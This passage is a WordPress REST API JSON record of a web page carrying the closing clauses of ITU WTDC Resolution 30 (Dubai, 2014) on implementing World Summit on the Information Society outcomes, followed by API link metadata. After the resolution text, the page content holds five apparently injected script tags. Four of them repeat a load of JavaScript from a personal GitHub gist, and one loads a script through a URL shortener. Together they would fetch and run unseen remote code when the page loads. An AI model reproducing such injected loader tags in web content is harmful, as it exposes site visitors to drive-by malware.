Plan of Action;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">ii) the Tunis Agenda;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">iii) the outcomes of the WSIS review process,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">calls upon Member States<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1 to continue to give priority to the development of the telecommunication\/ICT infrastructure, including in rural, remote and underserved areas, to building confidence and security in the use of telecommunications\/ICTs, to fostering an enabling environment and to ICT applications, in order to build the information society;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2 to consider the development of principles towards the adoption of strategies in areas such as telecommunication network security, consistent with WSIS Action Line C5;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3 to submit contributions to relevant ITU\u2011D study groups and to the Telecommunication Development Advisory Group, where appropriate, and contribute to CWG-WSIS on implementing WSIS outcomes within ITU&#8217;s mandate;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4 to continue to support and collaborate with the Director of BDT in implementing relevant WSIS outcomes in ITU\u2011D;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">5 to engage in the WSIS+10 process, in order to reaffirm the need to address remaining challenges of ICT for development to be addressed in the implementation of WSIS beyond 2015,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">requests the Secretary-General<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">to bring this resolution to the attention of the Plenipotentiary Conference (Busan, 2014) for consideration and required action, as appropriate, when reviewing Resolution 140 (Rev. Guadalajara, 2010).<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTDC RESOLUTION 30 (Rev. Dubai, 2014) Role of the ITU Telecommunication Development Sector in implementing the outcomes of the World Summit on the Information Society The World Telecommunication Development Conference (Dubai, 2014), recalling a) Resolution 71 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on the strategic plan for the Union for 2012-2015; b) Resolution 130 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1580,"menu_order":30,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1605","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1605","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=1605"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1605\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1580"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=1605"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}